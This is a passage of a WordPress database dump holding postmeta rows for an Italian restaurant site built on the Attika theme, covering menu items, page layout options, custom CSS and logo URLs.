tem_parent','0'),(30766,3404,'_menu_item_object_id','3404'),(30767,3404,'_menu_item_object','custom'),(30768,3404,'_menu_item_target',''),(30769,3404,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30770,3404,'_menu_item_xfn',''),(30771,3404,'_menu_item_url','#'),(30772,3404,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30773,3404,'_menu_item_icon','null'),(30774,3405,'_menu_item_type','custom'),(30775,3405,'_menu_item_menu_item_parent','0'),(30776,3405,'_menu_item_object_id','3405'),(30777,3405,'_menu_item_object','custom'),(30778,3405,'_menu_item_target',''),(30779,3405,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30780,3405,'_menu_item_xfn',''),(30781,3405,'_menu_item_url','#'),(30782,3405,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30783,3405,'_menu_item_icon','null'),(30784,3406,'_menu_item_type','custom'),(30785,3406,'_menu_item_menu_item_parent','0'),(30786,3406,'_menu_item_object_id','3406'),(30787,3406,'_menu_item_object','custom'),(30788,3406,'_menu_item_target',''),(30789,3406,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30790,3406,'_menu_item_xfn',''),(30791,3406,'_menu_item_url','#'),(30792,3406,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30793,3406,'_menu_item_type_menu','wide'),(30794,3406,'_menu_item_icon','null'),(30795,3407,'_menu_item_type','custom'),(30796,3407,'_menu_item_menu_item_parent','0'),(30797,3407,'_menu_item_object_id','3407'),(30798,3407,'_menu_item_object','custom'),(30799,3407,'_menu_item_target',''),(30800,3407,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30801,3407,'_menu_item_xfn',''),(30802,3407,'_menu_item_url','#'),(30803,3407,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30804,3408,'_menu_item_type','custom'),(30805,3408,'_menu_item_menu_item_parent','0'),(30806,3408,'_menu_item_object_id','3408'),(30807,3408,'_menu_item_object','custom'),(30808,3408,'_menu_item_target',''),(30809,3408,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30810,3408,'_menu_item_xfn',''),(30811,3408,'_menu_item_url','#'),(30812,3408,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30813,3409,'_menu_item_type','custom'),(30814,3409,'_menu_item_menu_item_parent','0'),(30815,3409,'_menu_item_object_id','3409'),(30816,3409,'_menu_item_object','custom'),(30817,3409,'_menu_item_target',''),(30818,3409,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30819,3409,'_menu_item_xfn',''),(30820,3409,'_menu_item_url','#'),(30821,3409,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30822,3410,'_menu_item_type','custom'),(30823,3410,'_menu_item_menu_item_parent','0'),(30824,3410,'_menu_item_object_id','3410'),(30825,3410,'_menu_item_object','custom'),(30826,3410,'_menu_item_target',''),(30827,3410,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30828,3410,'_menu_item_xfn',''),(30829,3410,'_menu_item_url','#'),(30830,3410,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30831,3411,'_menu_item_type','custom'),(30832,3411,'_menu_item_menu_item_parent','0'),(30833,3411,'_menu_item_object_id','3411'),(30834,3411,'_menu_item_object','custom'),(30835,3411,'_menu_item_target',''),(30836,3411,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30837,3411,'_menu_item_xfn',''),(30838,3411,'_menu_item_url','#'),(30839,3411,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30840,3412,'_menu_item_type','custom'),(30841,3412,'_menu_item_menu_item_parent','0'),(30842,3412,'_menu_item_object_id','3412'),(30843,3412,'_menu_item_object','custom'),(30844,3412,'_menu_item_target',''),(30845,3412,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30846,3412,'_menu_item_xfn',''),(30847,3412,'_menu_item_url','#'),(30848,3412,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30849,3413,'_menu_item_type','custom'),(30850,3413,'_menu_item_menu_item_parent','0'),(30851,3413,'_menu_item_object_id','3413'),(30852,3413,'_menu_item_object','custom'),(30853,3413,'_menu_item_target',''),(30854,3413,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30855,3413,'_menu_item_xfn',''),(30856,3413,'_menu_item_url','#'),(30857,3413,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30858,3414,'_menu_item_type','custom'),(30859,3414,'_menu_item_menu_item_parent','0'),(30860,3414,'_menu_item_object_id','3414'),(30861,3414,'_menu_item_object','custom'),(30862,3414,'_menu_item_target',''),(30863,3414,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30864,3414,'_menu_item_xfn',''),(30865,3414,'_menu_item_url','#'),(30866,3414,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30867,3415,'_menu_item_type','custom'),(30868,3415,'_menu_item_menu_item_parent','0'),(30869,3415,'_menu_item_object_id','3415'),(30870,3415,'_menu_item_object','custom'),(30871,3415,'_menu_item_target',''),(30872,3415,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30873,3415,'_menu_item_xfn',''),(30874,3415,'_menu_item_url','#'),(30875,3415,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30876,3416,'_menu_item_type','custom'),(30877,3416,'_menu_item_menu_item_parent','3398'),(30878,3416,'_menu_item_object_id','3416'),(30879,3416,'_menu_item_object','custom'),(30880,3416,'_menu_item_target',''),(30881,3416,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30882,3416,'_menu_item_xfn',''),(30883,3416,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(30884,3416,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30885,3416,'_menu_item_icon','null'),(30886,3417,'_menu_item_type','custom'),(30887,3417,'_menu_item_menu_item_parent','3398'),(30888,3417,'_menu_item_object_id','3417'),(30889,3417,'_menu_item_object','custom'),(30890,3417,'_menu_item_target',''),(30891,3417,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30892,3417,'_menu_item_xfn',''),(30893,3417,'_menu_item_url','#'),(30894,3417,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30895,3417,'_menu_item_icon','null'),(30896,3418,'_menu_item_type','custom'),(30897,3418,'_menu_item_menu_item_parent','3398'),(30898,3418,'_menu_item_object_id','3418'),(30899,3418,'_menu_item_object','custom'),(30900,3418,'_menu_item_target',''),(30901,3418,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30902,3418,'_menu_item_xfn',''),(30903,3418,'_menu_item_url','#'),(30904,3418,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30905,3418,'_menu_item_icon','null'),(30906,3419,'_menu_item_type','custom'),(30907,3419,'_menu_item_menu_item_parent','3404'),(30908,3419,'_menu_item_object_id','3419'),(30909,3419,'_menu_item_object','custom'),(30910,3419,'_menu_item_target',''),(30911,3419,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30912,3419,'_menu_item_xfn',''),(30913,3419,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(30914,3419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30915,3419,'_menu_item_icon','null'),(30916,3420,'_menu_item_type','custom'),(30917,3420,'_menu_item_menu_item_parent','3404'),(30918,3420,'_menu_item_object_id','3420'),(30919,3420,'_menu_item_object','custom'),(30920,3420,'_menu_item_target',''),(30921,3420,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30922,3420,'_menu_item_xfn',''),(30923,3420,'_menu_item_url','#'),(30924,3420,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30925,3420,'_menu_item_icon','null'),(30926,3421,'_menu_item_type','custom'),(30927,3421,'_menu_item_menu_item_parent','3404'),(30928,3421,'_menu_item_object_id','3421'),(30929,3421,'_menu_item_object','custom'),(30930,3421,'_menu_item_target',''),(30931,3421,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30932,3421,'_menu_item_xfn',''),(30933,3421,'_menu_item_url','#'),(30934,3421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30935,3421,'_menu_item_icon','null'),(30936,3422,'_menu_item_type','custom'),(30937,3422,'_menu_item_menu_item_parent','3409'),(30938,3422,'_menu_item_object_id','3422'),(30939,3422,'_menu_item_object','custom'),(30940,3422,'_menu_item_target',''),(30941,3422,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30942,3422,'_menu_item_xfn',''),(30943,3422,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(30944,3422,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30945,3423,'_menu_item_type','custom'),(30946,3423,'_menu_item_menu_item_parent','3414'),(30947,3423,'_menu_item_object_id','3423'),(30948,3423,'_menu_item_object','custom'),(30949,3423,'_menu_item_target',''),(30950,3423,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30951,3423,'_menu_item_xfn',''),(30952,3423,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(30953,3423,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30954,3424,'_menu_item_type','custom'),(30955,3424,'_menu_item_menu_item_parent','3400'),(30956,3424,'_menu_item_object_id','3424'),(30957,3424,'_menu_item_object','custom'),(30958,3424,'_menu_item_target',''),(30959,3424,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30960,3424,'_menu_item_xfn',''),(30961,3424,'_menu_item_url','#'),(30962,3424,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30963,3424,'_menu_item_icon','null'),(30964,3425,'_menu_item_type','custom'),(30965,3425,'_menu_item_menu_item_parent','3400'),(30966,3425,'_menu_item_object_id','3425'),(30967,3425,'_menu_item_object','custom'),(30968,3425,'_menu_item_target',''),(30969,3425,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30970,3425,'_menu_item_xfn',''),(30971,3425,'_menu_item_url','#'),(30972,3425,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30973,3425,'_menu_item_icon','null'),(30974,3426,'_menu_item_type','custom'),(30975,3426,'_menu_item_menu_item_parent','3400'),(30976,3426,'_menu_item_object_id','3426'),(30977,3426,'_menu_item_object','custom'),(30978,3426,'_menu_item_target',''),(30979,3426,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30980,3426,'_menu_item_xfn',''),(30981,3426,'_menu_item_url','#'),(30982,3426,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30983,3426,'_menu_item_icon','null'),(30984,3427,'_menu_item_type','custom'),(30985,3427,'_menu_item_menu_item_parent','3400'),(30986,3427,'_menu_item_object_id','3427'),(30987,3427,'_menu_item_object','custom'),(30988,3427,'_menu_item_target',''),(30989,3427,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30990,3427,'_menu_item_xfn',''),(30991,3427,'_menu_item_url','#'),(30992,3427,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30993,3427,'_menu_item_icon','null'),(30994,3428,'_menu_item_type','custom'),(30995,3428,'_menu_item_menu_item_parent','3406'),(30996,3428,'_menu_item_object_id','3428'),(30997,3428,'_menu_item_object','custom'),(30998,3428,'_menu_item_target',''),(30999,3428,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31000,3428,'_menu_item_xfn',''),(31001,3428,'_menu_item_url','#'),(31002,3428,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31003,3428,'_menu_item_icon','null'),(31004,3429,'_menu_item_type','custom'),(31005,3429,'_menu_item_menu_item_parent','3406'),(31006,3429,'_menu_item_object_id','3429'),(31007,3429,'_menu_item_object','custom'),(31008,3429,'_menu_item_target',''),(31009,3429,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31010,3429,'_menu_item_xfn',''),(31011,3429,'_menu_item_url','#'),(31012,3429,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31013,3429,'_menu_item_icon','null'),(31014,3430,'_menu_item_type','custom'),(31015,3430,'_menu_item_menu_item_parent','3406'),(31016,3430,'_menu_item_object_id','3430'),(31017,3430,'_menu_item_object','custom'),(31018,3430,'_menu_item_target',''),(31019,3430,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31020,3430,'_menu_item_xfn',''),(31021,3430,'_menu_item_url','#'),(31022,3430,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31023,3430,'_menu_item_icon','null'),(31024,3431,'_menu_item_type','custom'),(31025,3431,'_menu_item_menu_item_parent','3406'),(31026,3431,'_menu_item_object_id','3431'),(31027,3431,'_menu_item_object','custom'),(31028,3431,'_menu_item_target',''),(31029,3431,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31030,3431,'_menu_item_xfn',''),(31031,3431,'_menu_item_url','#'),(31032,3431,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31033,3431,'_menu_item_icon','null'),(31034,3432,'_menu_item_type','custom'),(31035,3432,'_menu_item_menu_item_parent','3399'),(31036,3432,'_menu_item_object_id','3432'),(31037,3432,'_menu_item_object','custom'),(31038,3432,'_menu_item_target',''),(31039,3432,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31040,3432,'_menu_item_xfn',''),(31041,3432,'_menu_item_url','#'),(31042,3432,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31043,3432,'_menu_item_icon','null'),(31044,3433,'_menu_item_type','custom'),(31045,3433,'_menu_item_menu_item_parent','3405'),(31046,3433,'_menu_item_object_id','3433'),(31047,3433,'_menu_item_object','custom'),(31048,3433,'_menu_item_target',''),(31049,3433,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31050,3433,'_menu_item_xfn',''),(31051,3433,'_menu_item_url','#'),(31052,3433,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31053,3433,'_menu_item_icon','null'),(31054,3434,'_menu_item_type','custom'),(31055,3434,'_menu_item_menu_item_parent','3397'),(31056,3434,'_menu_item_object_id','3434'),(31057,3434,'_menu_item_object','custom'),(31058,3434,'_menu_item_target',''),(31059,3434,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31060,3434,'_menu_item_xfn',''),(31061,3434,'_menu_item_url','#'),(31062,3434,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31063,3434,'_menu_item_icon','null'),(31064,3435,'_menu_item_type','custom'),(31065,3435,'_menu_item_menu_item_parent','3403'),(31066,3435,'_menu_item_object_id','3435'),(31067,3435,'_menu_item_object','custom'),(31068,3435,'_menu_item_target',''),(31069,3435,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31070,3435,'_menu_item_xfn',''),(31071,3435,'_menu_item_url','#'),(31072,3435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31073,3435,'_menu_item_icon','null'),(31074,3436,'_menu_item_type','custom'),(31075,3436,'_menu_item_menu_item_parent','3399'),(31076,3436,'_menu_item_object_id','3436'),(31077,3436,'_menu_item_object','custom'),(31078,3436,'_menu_item_target',''),(31079,3436,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31080,3436,'_menu_item_xfn',''),(31081,3436,'_menu_item_url','#'),(31082,3436,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31083,3436,'_menu_item_icon','null'),(31084,3437,'_menu_item_type','custom'),(31085,3437,'_menu_item_menu_item_parent','3399'),(31086,3437,'_menu_item_object_id','3437'),(31087,3437,'_menu_item_object','custom'),(31088,3437,'_menu_item_target',''),(31089,3437,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31090,3437,'_menu_item_xfn',''),(31091,3437,'_menu_item_url','#'),(31092,3437,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31093,3437,'_menu_item_icon','null'),(31094,3438,'_menu_item_type','custom'),(31095,3438,'_menu_item_menu_item_parent','0'),(31096,3438,'_menu_item_object_id','3438'),(31097,3438,'_menu_item_object','custom'),(31098,3438,'_menu_item_target',''),(31099,3438,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31100,3438,'_menu_item_xfn',''),(31101,3438,'_menu_item_url','#'),(31102,3438,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31103,3439,'_menu_item_type','custom'),(31104,3439,'_menu_item_menu_item_parent','3403'),(31105,3439,'_menu_item_object_id','3439'),(31106,3439,'_menu_item_object','custom'),(31107,3439,'_menu_item_target',''),(31108,3439,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31109,3439,'_menu_item_xfn',''),(31110,3439,'_menu_item_url','#'),(31111,3439,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31112,3439,'_menu_item_icon','null'),(31113,3440,'_menu_item_type','custom'),(31114,3440,'_menu_item_menu_item_parent','3403'),(31115,3440,'_menu_item_object_id','3440'),(31116,3440,'_menu_item_object','custom'),(31117,3440,'_menu_item_target',''),(31118,3440,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(31119,3440,'_menu_item_xfn',''),(31120,3440,'_menu_item_url','#'),(31121,3440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31122,3440,'_menu_item_icon','null'),(31123,2,'_wp_page_template','default'),(31124,3,'_wp_page_template','default'),(31125,3034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31126,3034,'_wp_page_template','default'),(31127,3034,'slide_template','default'),(31128,3034,'_wpb_vc_js_status','false'),(31129,3034,'mkdf_page_content_behind_header_meta','no'),(31130,3034,'mkdf_disable_vertical_header_background_image_meta','no'),(31131,3034,'mkdf_disable_header_widget_areas_meta','no'),(31132,3034,'mkdf_title_area_type_meta','attika'),(31133,3034,'mkdf_header_type_meta','header-divided'),(31134,3034,'mkdf_header_behaviour_meta','no-behavior'),(31135,3034,'mkdf_menu_area_background_color_meta','#ffffff'),(31136,3034,'mkdf_sidebar_layout_meta','sidebar-25-right'),(31137,3034,'mkdf_custom_sidebar_area_meta','shop-sidebar'),(31138,3034,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31139,3034,'mkdf_page_content_padding','70px 0 100px'),(31140,3035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31141,3035,'_wp_page_template','default'),(31142,3035,'slide_template','default'),(31143,3035,'_wpb_vc_js_status','false'),(31144,3035,'mkdf_page_content_behind_header_meta','no'),(31145,3035,'mkdf_disable_vertical_header_background_image_meta','no'),(31146,3035,'mkdf_disable_header_widget_areas_meta','no'),(31147,3035,'mkdf_title_area_type_meta','attika'),(31148,3035,'mkdf_page_content_padding','100px 0'),(31149,3035,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31150,3035,'mkdf_menu_area_background_color_meta','#ffffff'),(31151,3036,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31152,3036,'_wp_page_template','default'),(31153,3036,'slide_template','default'),(31154,3036,'_wpb_vc_js_status','false'),(31155,3036,'mkdf_page_content_behind_header_meta','no'),(31156,3036,'mkdf_disable_vertical_header_background_image_meta','no'),(31157,3036,'mkdf_disable_header_widget_areas_meta','no'),(31158,3036,'mkdf_title_area_type_meta','attika'),(31159,3036,'mkdf_menu_area_background_color_meta','#ffffff'),(31160,3036,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31161,3036,'mkdf_page_content_padding','85px 0 30px'),(31162,3037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31163,3037,'_wp_page_template','default'),(31164,3037,'slide_template','default'),(31165,3037,'_wpb_vc_js_status','false'),(31166,3037,'mkdf_page_content_behind_header_meta','no'),(31167,3037,'mkdf_disable_vertical_header_background_image_meta','no'),(31168,3037,'mkdf_disable_header_widget_areas_meta','no'),(31169,3037,'mkdf_title_area_type_meta','attika'),(31170,3037,'mkdf_menu_area_background_color_meta','#ffffff'),(31171,3037,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(31172,3037,'mkdf_page_content_padding','120px 0px 86px 0px'),(31173,3038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31174,3038,'_wp_page_template','full-width.php'),(31175,3038,'slide_template','default'),(31176,3038,'_wpb_vc_js_status','true'),(31177,3038,'mkdf_page_content_behind_header_meta','no'),(31178,3038,'mkdf_disable_vertical_header_background_image_meta','no'),(31179,3038,'mkdf_disable_header_widget_areas_meta','no'),(31180,3038,'mkdf_page_content_padding','80px 0 110px'),(31181,3039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31182,3039,'_wp_page_template','full-width.php'),(31183,3039,'slide_template','default'),(31184,3039,'_wpb_vc_js_status','false'),(31185,3039,'mkdf_page_content_behind_header_meta','no'),(31186,3039,'mkdf_disable_vertical_header_background_image_meta','no'),(31187,3039,'mkdf_disable_header_widget_areas_meta','no'),(31189,3040,'_wp_page_template','full-width.php'),(31190,3040,'slide_template','default'),(31191,3040,'_wpb_vc_js_status','true'),(31192,3040,'mkdf_page_content_behind_header_meta','no'),(31193,3040,'mkdf_page_content_padding','100px 0 0 0'),(31194,3040,'mkdf_page_content_padding_mobile','100px 0 0 0'),(31195,3040,'mkdf_header_type_meta','header-divided'),(31196,3040,'mkdf_disable_vertical_header_background_image_meta','no'),(31197,3040,'mkdf_disable_header_widget_areas_meta','no'),(31198,3040,'mkdf_show_title_area_meta','no'),(31199,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(44579,3059,'_yoast_wpseo_estimated-reading-time-minutes','1'),(58610,4624,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58609,4624,'success','1'),(44582,3980,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(31200,3040,'mkdf_menu_area_background_color_meta','#f8f2ed'),(31201,3040,'mkdf_menu_area_height_meta','70px'),(31202,3040,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(31203,3040,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(31204,3040,'mkdf_custom_sticky_menu_area_sidebar_meta','custom-sticky'),(31205,3040,'mkdf_smooth_page_transitions_meta','yes'),(31206,3040,'mkdf_page_transition_preloader_meta','yes'),(31207,3040,'mkdf_smooth_pt_spinner_type_meta','pulse'),(31208,3040,'mkdf_smooth_pt_spinner_color_meta','#000000'),(31209,3041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31210,3041,'_wp_page_template','full-width.php'),(31211,3041,'slide_template','default'),(31212,3041,'_wpb_vc_js_status','true'),(31213,3041,'mkdf_page_content_behind_header_meta','no'),(31214,3041,'mkdf_disable_vertical_header_background_image_meta','no'),(31215,3041,'mkdf_disable_header_widget_areas_meta','yes'),(31216,3041,'mkdf_page_content_padding','0'),(31217,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(31218,3041,'mkdf_show_title_area_meta','no'),(31219,3041,'mkdf_logo_image_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(31220,3041,'mkdf_logo_image_dark_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(31221,3041,'mkdf_logo_image_light_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(31222,3041,'mkdf_logo_image_sticky_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(31223,3041,'mkdf_logo_image_mobile_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(31224,3041,'_wpb_post_custom_css','.mkdf-page-header .mkdf-logo-area .mkdf-logo-wrapper a,\n.mkdf-page-header .mkdf-menu-area .mkdf-logo-wrapper a {\n    max-height: 125px;\n}\n\n@media only screen and (min-width: 1025px) {\n    .home-two-second-row,\n    .home-two-third-row {\n        display: none;\n    }\n}\n\n@media only screen and (max-width: 1024px) {\n    .home-two-first-row {\n        display: none;\n    }\n}'),(31225,3041,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(31226,3041,'mkdf_smooth_page_transitions_meta','yes'),(31227,3041,'mkdf_page_transition_preloader_meta','yes'),(31228,3041,'mkdf_smooth_pt_spinner_type_meta','pulse'),(31229,3041,'mkdf_smooth_pt_spinner_color_meta','#000000'),(31230,3042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31231,3042,'_wp_page_template','full-width.php'),(31232,3042,'slide_template','default'),(31233,3042,'_wpb_vc_js_status','true'),(31234,3042,'mkdf_page_content_behind_header_meta','no'),(31235,3042,'mkdf_disable_vertical_header_background_image_meta','no'),(31236,3042,'mkdf_disable_header_widget_areas_meta','no'),(31237,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(31238,3042,'mkdf_page_content_padding','0'),(31239,3042,'mkdf_header_type_meta','header-bottom'),(31240,3042,'mkdf_show_title_area_meta','no'),(31241,3042,'mkdf_menu_area_side_padding_meta','30px'),(31242,3042,'mkdf_page_slider_meta','[rev_slider alias=\"seafood-restaurant\"]'),(31243,3043,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(31244,3043,'_wp_page_template','full-width.php'),(31245,3043,'slide_template','default'),(31246,3043,'_wpb_vc_js_status','true'),(31247,3043,'mkdf_page_content_behind_header_meta','no'),(31248,3043,'mkdf_disable_vertical_header_background_image_meta','no'),(31249,3043,'mkdf_disable_header_widget_areas_meta','no'),(31250,3043,'mkdf_page_content_padding','0'),(31251,3043,'mkdf_header_type_meta','header-divided'),(31252,3043,'mkdf_show_title_area_meta','no'),(31253,3043,'mkdf_menu_area_background_color_meta','#ffffff'),(31254,3043,'mkdf_menu_area_background_transparency_meta','1'),(31255,3043,'mkdf_menu_area_height_meta','80'),(31256,3043,'mkdf_disable_footer_meta','yes'),(31257,3043,'mkdf_header_behaviour_meta','fixed-on-scroll'),(31258,3043,'_wpb_shortcodes_custom_css','.